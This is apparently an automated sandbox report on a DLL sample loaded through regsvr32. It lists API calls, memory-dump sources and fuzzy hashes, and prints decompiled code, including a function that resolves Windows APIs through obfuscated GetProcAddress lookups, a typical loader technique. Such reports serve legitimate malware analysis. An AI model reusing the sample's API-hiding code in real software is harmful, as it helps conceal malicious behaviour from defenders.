                                                                                                                                                                                                                                                              0x6e201a08
                                                                                                                                                                                                                                                              0x6e201a31
                                                                                                                                                                                                                                                              0x6e201a32
                                                                                                                                                                                                                                                              0x6e201a32
                                                                                                                                                                                                                                                              0x6e2019fb
                                                                                                                                                                                                                                                              0x6e201a48

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetSystemTimeAsFileTime.KERNEL32(?,00000002,00000000,?,?,?,?,?,?,?,?,?,6E20176E,0000000A,?,?), ref: 6E201986
                                                                                                                                                                                                                                                              • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 6E20199C
                                                                                                                                                                                                                                                              • _snwprintf.NTDLL ref: 6E2019C1
                                                                                                                                                                                                                                                              • CreateFileMappingW.KERNEL32(000000FF,6E2041C0,00000004,00000000,?,?), ref: 6E2019E6
                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6E20176E,0000000A,?), ref: 6E2019FD
                                                                                                                                                                                                                                                              • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 6E201A11
                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6E20176E,0000000A,?), ref: 6E201A29
                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6E20176E,0000000A), ref: 6E201A32
                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6E20176E,0000000A,?), ref: 6E201A3A
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000002.00000002.471393143.000000006E201000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.471383950.000000006E200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.471419429.000000006E203000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.471444834.000000006E205000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.471467724.000000006E206000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1724014008-0
                                                                                                                                                                                                                                                              • Opcode ID: c8d851f39d5243e62128393ef7c114c262424e76e4865141163a96beed57982c
                                                                                                                                                                                                                                                              • Instruction ID: 0fd1ad9b33354598d39a0056cdae83ac4f47f71e79f8f3af4dd86801b30fcd67
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c8d851f39d5243e62128393ef7c114c262424e76e4865141163a96beed57982c
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A02190B250011DAFDB119FE8DC88E9E77AFEB49359F104029F611E71C0D6705A85CB70
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 6E255818: _free.LIBCMT ref: 6E25583D
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E25589E
                                                                                                                                                                                                                                                                • Part of subcall function 6E24D68A: HeapFree.KERNEL32(00000000,00000000,?,6E255842,?,00000000,?,6E280096,?,6E255869,?,00000007,?,?,6E252AD1,?), ref: 6E24D6A0
                                                                                                                                                                                                                                                                • Part of subcall function 6E24D68A: GetLastError.KERNEL32(?,?,6E255842,?,00000000,?,6E280096,?,6E255869,?,00000007,?,?,6E252AD1,?,?), ref: 6E24D6B2
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E2558A9
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E2558B4
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E255908
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E255913
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E25591E
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E255929
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000002.00000002.471489617.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                                                                                                              • Opcode ID: 2536a4e061a4774c2413857fa71987725cc3c57037fa6d39a53ba6d9bf290c9a
                                                                                                                                                                                                                                                              • Instruction ID: fee60e6893048a2432fc334691462a7326bdbd6e35a6d083ec0d53926620e21c
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2536a4e061a4774c2413857fa71987725cc3c57037fa6d39a53ba6d9bf290c9a
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2F116D75591B0CEBE720A7F0DD0AFCB779EAF00704F408C14B69E66250DB65A5554F90
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetConsoleCP.KERNEL32(?,00000001,00000000), ref: 6E253593
                                                                                                                                                                                                                                                              • __fassign.LIBCMT ref: 6E253772
                                                                                                                                                                                                                                                              • __fassign.LIBCMT ref: 6E25378F
                                                                                                                                                                                                                                                              • WriteFile.KERNEL32(?,6E24F5F6,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6E2537D7
                                                                                                                                                                                                                                                              • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6E253817
                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6E2538C3
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000002.00000002.471489617.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: FileWrite__fassign$ConsoleErrorLast
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 4031098158-0
                                                                                                                                                                                                                                                              • Opcode ID: f100bf019aaf72c076221a591bef9e9b3764a364c382b3106dcebdc342a62c44
                                                                                                                                                                                                                                                              • Instruction ID: afc0f8564cf7d9b32822ba571010b024c1d9b2059c3a6f6727d804321754e951
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f100bf019aaf72c076221a591bef9e9b3764a364c382b3106dcebdc342a62c44
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 91D1B9B5D0024D9FDB05CFE8CA889EDBBB6BF09314F24116AE855BB345D330A916CB60
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                                                              			E6E201AA5(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                                                                                                                                                                                                                                              				intOrPtr _v8;
                                                                                                                                                                                                                                                              				_Unknown_base(*)()* _t29;
                                                                                                                                                                                                                                                              				_Unknown_base(*)()* _t33;
                                                                                                                                                                                                                                                              				_Unknown_base(*)()* _t36;
                                                                                                                                                                                                                                                              				_Unknown_base(*)()* _t39;
                                                                                                                                                                                                                                                              				_Unknown_base(*)()* _t42;
                                                                                                                                                                                                                                                              				intOrPtr _t46;
                                                                                                                                                                                                                                                              				struct HINSTANCE__* _t50;
                                                                                                                                                                                                                                                              				intOrPtr _t56;
                                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                                              				_t56 = E6E201C8F(0x20);
                                                                                                                                                                                                                                                              				if(_t56 == 0) {
                                                                                                                                                                                                                                                              					_v8 = 8;
                                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                                              					_t50 = GetModuleHandleA( *0x6e2041d0 + 0x6e205014);
                                                                                                                                                                                                                                                              					_v8 = 0x7f;
                                                                                                                                                                                                                                                              					_t29 = GetProcAddress(_t50,  *0x6e2041d0 + 0x6e2050e1);
                                                                                                                                                                                                                                                              					 *(_t56 + 0xc) = _t29;
                                                                                                                                                                                                                                                              					if(_t29 == 0) {
                                                                                                                                                                                                                                                              						L8:
                                                                                                                                                                                                                                                              						E6E20136A(_t56);
                                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                                              						_t33 = GetProcAddress(_t50,  *0x6e2041d0 + 0x6e2050f1);
                                                                                                                                                                                                                                                              						 *(_t56 + 0x10) = _t33;
                                                                                                                                                                                                                                                              						if(_t33 == 0) {
                                                                                                                                                                                                                                                              							goto L8;
                                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                                              							_t36 = GetProcAddress(_t50,  *0x6e2041d0 + 0x6e205104);
                                                                                                                                                                                                                                                              							 *(_t56 + 0x14) = _t36;
                                                                                                                                                                                                                                                              							if(_t36 == 0) {
                                                                                                                                                                                                                                                              								goto L8;
                                                                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                                                                              								_t39 = GetProcAddress(_t50,  *0x6e2041d0 + 0x6e205119);
                                                                                                                                                                                                                                                              								 *(_t56 + 0x18) = _t39;
                                                                                                                                                                                                                                                              								if(_t39 == 0) {
                                                                                                                                                                                                                                                              									goto L8;
                                                                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                                                                              									_t42 = GetProcAddress(_t50,  *0x6e2041d0 + 0x6e20512f);
                                                                                                                                                                                                                                                              									 *(_t56 + 0x1c) = _t42;
                                                                                                                                                                                                                                                              									if(_t42 == 0) {
                                                                                                                                                                                                                                                              										goto L8;
                                                                                                                                                                                                                                                              									} else {
                                                                                                                                                                                                                                                              										 *((intOrPtr*)(_t56 + 8)) = _a8;
                                                                                                                                                                                                                                                              										 *((intOrPtr*)(_t56 + 4)) = _a4;
                                                                                                                                                                                                                                                              										_t46 = E6E2018D1(_t56, _a12);
                                                                                                                                                                                                                                                              										_v8 = _t46;
                                                                                                                                                                                                                                                              										if(_t46 != 0) {
                                                                                                                                                                                                                                                              											goto L8;
                                                                                                                                                                                                                                                              										} else {
                                                                                                                                                                                                                                                              											 *_a16 = _t56;
                                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                                              				return _v8;
                                                                                                                                                                                                                                                              			}












                                                                                                                                                                                                                                                              0x6e201ab3
                                                                                                                                                                                                                                                              0x6e201ab7
                                                                                                                                                                                                                                                              0x6e201b78
                                                                                                                                                                                                                                                              0x6e201abd
                                                                                                                                                                                                                                                              0x6e201ad5
                                                                                                                                                                                                                                                              0x6e201ae4
                                                                                                                                                                                                                                                              0x6e201aeb
                                                                                                                                                                                                                                                              0x6e201aef
                                                                                                                                                                                                                                                              0x6e201af2
                                                                                                                                                                                                                                                              0x6e201b70
                                                                                                                                                                                                                                                              0x6e201b71
                                                                                                                                                                                                                                                              0x6e201af4
                                                                                                                                                                                                                                                              0x6e201b01
                                                                                                                                                                                                                                                              0x6e201b05
                                                                                                                                                                                                                                                              0x6e201b08
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e201b0a
                                                                                                                                                                                                                                                              0x6e201b17
                                                                                                                                                                                                                                                              0x6e201b1b
                                                                                                                                                                                                                                                              0x6e201b1e
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e201b20
                                                                                                                                                                                                                                                              0x6e201b2d
                                                                                                                                                                                                                                                              0x6e201b31
                                                                                                                                                                                                                                                              0x6e201b34
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e201b36
                                                                                                                                                                                                                                                              0x6e201b43
                                                                                                                                                                                                                                                              0x6e201b47
                                                                                                                                                                                                                                                              0x6e201b4a
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e201b4c
                                                                                                                                                                                                                                                              0x6e201b52
                                                                                                                                                                                                                                                              0x6e201b58
                                                                                                                                                                                                                                                              0x6e201b5d
                                                                                                                                                                                                                                                              0x6e201b64
                                                                                                                                                                                                                                                              0x6e201b67
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e201b69
                                                                                                                                                                                                                                                              0x6e201b6c
                                                                                                                                                                                                                                                              0x6e201b6c
                                                                                                                                                                                                                                                              0x6e201b67
                                                                                                                                                                                                                                                              0x6e201b4a
                                                                                                                                                                                                                                                              0x6e201b34
                                                                                                                                                                                                                                                              0x6e201b1e
                                                                                                                                                                                                                                                              0x6e201b08
                                                                                                                                                                                                                                                              0x6e201af2
                                                                                                                                                                                                                                                              0x6e201b86

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 6E201C8F: HeapAlloc.KERNEL32(00000000,?,6E20117D,?,00000000,00000000,?,?,?,6E201810), ref: 6E201C9B
                                                                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(?,00000020,00000002,?,?,?,?,6E201272,?,?,?,?,00000002,00000000,?,?), ref: 6E201AC9
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 6E201AEB
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 6E201B01
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 6E201B17
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 6E201B2D
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 6E201B43
                                                                                                                                                                                                                                                                • Part of subcall function 6E2018D1: memset.NTDLL ref: 6E201950
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000002.00000002.471393143.000000006E201000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.471383950.000000006E200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.471419429.000000006E203000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.471444834.000000006E205000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.471467724.000000006E206000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: AddressProc$AllocHandleHeapModulememset
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 426539879-0
                                                                                                                                                                                                                                                              • Opcode ID: 949e389da852b8001c93ebe2b79e366dae7fba7e2a51fad3aa45882ee63347be
                                                                                                                                                                                                                                                              • Instruction ID: f8f8d66a9847529b30577345b35244a229110c95d72f9cc7fbc2e4f18fccae67
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 949e389da852b8001c93ebe2b79e366dae7fba7e2a51fad3aa45882ee63347be
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 132180B150060F9FDB50EFA9C884E5AB7EEFF59288B004529E855D7290E370EA45CBB0
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,6E248DA8,6E24700A,6E247312), ref: 6E2491A7
                                                                                                                                                                                                                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6E2491B5
                                                                                                                                                                                                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6E2491CE
                                                                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,6E248DA8,6E24700A,6E247312), ref: 6E249220
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000002.00000002.471489617.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3852720340-0
                                                                                                                                                                                                                                                              • Opcode ID: f7c3ee54ed675d6a64d536ca859dc75e0d46927bce43e8f0bcdca5955d0280af
                                                                                                                                                                                                                                                              • Instruction ID: 676e20a78a045e76bfdf9cfb25cfec19599d546950a3838bc7cbc2bc4b3aef2b
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f7c3ee54ed675d6a64d536ca859dc75e0d46927bce43e8f0bcdca5955d0280af
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B00145B625AA1FDFFB0D06F9ED89D973A5BEB03779B200639E520410C0FB914834D120
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000002.00000002.471489617.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: AdjustPointer
                                                                                                                                                                                                                                                              • String ID: y$n
                                                                                                                                                                                                                                                              • API String ID: 1740715915-731774800
                                                                                                                                                                                                                                                              • Opcode ID: 1eeead3c6870d0c88a81e7958a376a8111e416108ebdddd480f7da9cc7db7347
                                                                                                                                                                                                                                                              • Instruction ID: 3f96966e916fc6aae95d4a93a7f1fd0844c7ddb89262a95d318546c867919952
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1eeead3c6870d0c88a81e7958a376a8111e416108ebdddd480f7da9cc7db7347
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C251D17660460FDFEB1D9FD9CA50BAA7BAAEF02705F104929E815462D4D731E860CB90
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\regsvr32.exe, xrefs: 6E25120C
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000002.00000002.471489617.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                                                                                                              • API String ID: 0-3922119987
                                                                                                                                                                                                                                                              • Opcode ID: bdb415f4945ab409c4e6a9987e6e15b795458757d5cd1c3de59f2b2b806a0c71
                                                                                                                                                                                                                                                              • Instruction ID: 236c4c828d092802a2122237360690147cd77cbd8ffd86e20c3279554e2a0014
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bdb415f4945ab409c4e6a9987e6e15b795458757d5cd1c3de59f2b2b806a0c71
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 64217175614A2EBF97005FE59E80D9677AFAB0536D7004D14F918D6350E731ECA88BA0
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E2557C7
                                                                                                                                                                                                                                                                • Part of subcall function 6E24D68A: HeapFree.KERNEL32(00000000,00000000,?,6E255842,?,00000000,?,6E280096,?,6E255869,?,00000007,?,?,6E252AD1,?), ref: 6E24D6A0
                                                                                                                                                                                                                                                                • Part of subcall function 6E24D68A: GetLastError.KERNEL32(?,?,6E255842,?,00000000,?,6E280096,?,6E255869,?,00000007,?,?,6E252AD1,?,?), ref: 6E24D6B2
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E2557D9
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E2557EB
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E2557FD
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E25580F
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000002.00000002.471489617.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                                                                                                              • Opcode ID: d49535a4ef8ca49a0275abb315b68194c4567bf6e5752b47c39ad4faf8bbe7ea
                                                                                                                                                                                                                                                              • Instruction ID: a15ec74f0178b7d0881183cce415230650c0017c5e4b970fb49a7c44440e13dd
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d49535a4ef8ca49a0275abb315b68194c4567bf6e5752b47c39ad4faf8bbe7ea
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A6F0143148260EDBAB94DB98E599C5B33EFBF027127610809F41CD7600DB20F8C08EA4
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000002.00000002.471489617.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: _free
                                                                                                                                                                                                                                                              • String ID: *?
                                                                                                                                                                                                                                                              • API String ID: 269201875-2564092906
                                                                                                                                                                                                                                                              • Opcode ID: be0b59ba3c73918a4b6b6aaecc14d9a85920bed4f98c2dc0d16ea2f4ec30d012
                                                                                                                                                                                                                                                              • Instruction ID: b30e9e0bd04a8794e4232530a9a68b1ad97f1d27e4af14efd3295dc37289e90e
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: be0b59ba3c73918a4b6b6aaecc14d9a85920bed4f98c2dc0d16ea2f4ec30d012
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 14614AB5D0021E9FDB14CFA8C9809EDFBFAEF49314B24856AD815E7304E775AE418B90
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 6E248E5F
                                                                                                                                                                                                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 6E248F13
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000002.00000002.471489617.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                              • String ID: csm$y$n
                                                                                                                                                                                                                                                              • API String ID: 3480331319-3383992723
                                                                                                                                                                                                                                                              • Opcode ID: 6248558af29b3498b685ee2a764a1bf4bcbfa740e81ea6918b6f00023aa46b75
                                                                                                                                                                                                                                                              • Instruction ID: 20438a87cde174028c6bce8ef5fe25aeaf0dc456d7db6a3bf8fbddcbef05f307
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6248558af29b3498b685ee2a764a1bf4bcbfa740e81ea6918b6f00023aa46b75
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8D41B335A2021EEBCF08DFA8C884A9EBBB7BF45318F048455F9185B351D7319915CBD1
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • RtlEncodePointer.NTDLL(00000000), ref: 6E2498AB
                                                                                                                                                                                                                                                              • CatchIt.LIBVCRUNTIME ref: 6E249991
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000002.00000002.471489617.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CatchEncodePointer
                                                                                                                                                                                                                                                              • String ID: MOC$RCC
                                                                                                                                                                                                                                                              • API String ID: 1435073870-2084237596
                                                                                                                                                                                                                                                              • Opcode ID: b59250a37a04372f19d6f5f2e52db9df2855a4d4711f3d18ad78ec8234a419ff
                                                                                                                                                                                                                                                              • Instruction ID: aab345bd216e8d699692a67c7b05338f37ed5afa904620924ba77f143874294a
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b59250a37a04372f19d6f5f2e52db9df2855a4d4711f3d18ad78ec8234a419ff
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1141387190020FEFDF0ACFD4CE80AEE7BB6BF48305F144459E91866255D335A960DB50
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetModuleHandleExW.KERNEL32(00000000,6E27947C,00000000,?,?,6E24C2C2,?,?,6E24C28A,?,?,?), ref: 6E24C325
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,6E279494), ref: 6E24C338
                                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,6E24C2C2,?,?,6E24C28A,?,?,?), ref: 6E24C35B
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000002.00000002.471489617.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                              • String ID: y$n
                                                                                                                                                                                                                                                              • API String ID: 4061214504-731774800
                                                                                                                                                                                                                                                              • Opcode ID: ae4b65a0439839baf4bdbd87f1984ac23a858059e467356d9c5360f8ef6ccc3d
                                                                                                                                                                                                                                                              • Instruction ID: c2e646ddcdb8429db76bdfb22996f743dc8bc1929255a498ffe9d22f50f85f6e
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ae4b65a0439839baf4bdbd87f1984ac23a858059e467356d9c5360f8ef6ccc3d
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0DF08C31500A2EFBEF119BA5CA1EBDD7F7AEB00B66F044060A915A5150CB758E54EAA0
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E256DAD
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E256DD6
                                                                                                                                                                                                                                                              • SetEndOfFile.KERNEL32(00000000,6E254603,00000000,6E24FCD2,?,?,?,?,?,?,?,6E254603,6E24FCD2,00000000), ref: 6E256E08
                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,6E254603,6E24FCD2,00000000,?,?,?,?,00000000,?), ref: 6E256E24
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000002.00000002.471489617.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: _free$ErrorFileLast
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1547350101-0
                                                                                                                                                                                                                                                              • Opcode ID: c630971803dc57f2d9506a064620b80522115ff26c1e5779be91cf34746370af
                                                                                                                                                                                                                                                              • Instruction ID: 8222d74da1436e52c1e8dcb4a1c1ee6ccec66fabc002efa1c256ae6595cb219f
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c630971803dc57f2d9506a064620b80522115ff26c1e5779be91cf34746370af
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1141C27692160E9BDB415FF8CE80FCD377BAF46365F140D10E824A73A4EB35D8208A61
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 6E2510C1: _free.LIBCMT ref: 6E2510CF
                                                                                                                                                                                                                                                                • Part of subcall function 6E251C1A: WideCharToMultiByte.KERNEL32(?,00000000,6E24F667,00000000,00000001,6E24F5F6,6E253EDB,?,6E24F667,?,00000000,?,6E253C4A,0000FDE9,00000000,?), ref: 6E251CBC
                                                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 6E250B07
                                                                                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 6E250B0E
                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 6E250B4D
                                                                                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 6E250B54
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000002.00000002.471489617.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
